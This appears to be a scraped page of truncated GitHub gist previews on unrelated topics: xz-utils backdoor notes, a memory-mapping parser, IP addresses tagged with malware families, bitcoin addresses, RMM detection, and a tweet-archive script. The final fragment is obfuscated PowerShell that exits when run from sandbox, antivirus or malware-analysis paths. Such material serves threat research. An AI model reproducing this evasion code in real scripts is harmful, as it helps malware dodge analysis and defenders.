| [ | |
| "928350122843193385", | |
| "1185047194261274665", | |
| "956202276408688650", | |
| "956104664821157918", | |
| "1185047092478095443", | |
| "1185046791826178099", | |
| "1185047045413797898", | |
| "928483283698851901", | |
| "1185047444619284641", |
| #!/usr/bin/env python3 | |
| import ctypes | |
| import time | |
| import threading | |
| def test(): | |
| def access(path): | |
| f = open(path, 'rb') | |
| __ = f.read(8192) |
| There appears to be a string encoded in the binary payload: | |
| https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01#file-hashes-txt-L115 | |
| Which functions as a killswitch: | |
| https://piaille.fr/@zeno/112185928685603910 | |
| Thus, one workaround for affected systems might be to add this to `/etc/environment`: | |
| ``` |
This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.
On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that
| from __future__ import annotations | |
| import re | |
| from itertools import cycle | |
| MAX_SETTINGS = 128 | |
| def load_mapping(filename: str) -> dict[int, int]: | |
| """Processes textual Volatility memmap output into a page mapping.""" |
| WIN-QQ80VPAFRNH | |
| 84.252.95.225 - SolarMarker | |
| 37.120.237.251 - SolarMarker | |
| 217.138.205.170 - Ursnif | |
| 185.236.202.184 - Pegasus, NSO Group | |
| DESKTOP-2NFCDE2 | |
| 94.142.138.32 - Aurora Stealer | |
| 45.15.156.250 - Aurora Stealer | |
| 45.15.156.40 - Raccoon Stealer |
ℹ️ This was duplicated to this blog for readability and reference
The most difficult challenge with RMM detection is contextual awareness around usage to determine if it is valid or malicious.
| 15m7FP7U4kDJhAVtjjUdUB8WYswpf7Dtho | |
| 1Nm2TMEFEdyb2BP6tLyuREoKECztibuK6P | |
| 1LJYrTxrQA5pFRRg2bSyJLT6MGezmMBVfX | |
| 1EiCssanXmavzjtffYHzK6aVeQHngUxX1s | |
| 1H65AnxCg7mT4rTZmRzH8cxENk1N12rhkZ | |
| 1CVbdRQQ3TeWaPWqARKP9wvAEPvavJDrKo | |
| 1B9APV4ARm26MUW74ZcGNQE9hBHM5XGPbg | |
| 14u8xH6KdJFoTP93Lep9tpb1KQQvshQaAj | |
| 145V8AXLZpFv1ABVEsMYFsGpaZPwgKNZbf | |
| 1LGBP4iwrwv3GxybQ5QZJ19M3MAP76cw6U |
| $tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length) | |
| $tweets = $tweetJson | ConvertFrom-Json | |
| $currentThread = "" | |
| foreach($currentTweetJson in $tweets) | |
| { | |
| $currentTweet = $currentTweetJson.tweet | |
| if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes") | |
| { |
| $Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s'); Set ("{1}{0}"-f'e','PdWj') ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ; ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN" | |
| if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast')) {exit} | |
| if (${SCR`IP`TP`ATh} -match "avg") {exit} | |
| if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp')) {exit} | |
| if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit} | |
| if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a')) {exit} | |
| if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo')) {exit} | |
| if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus')) {exit} |
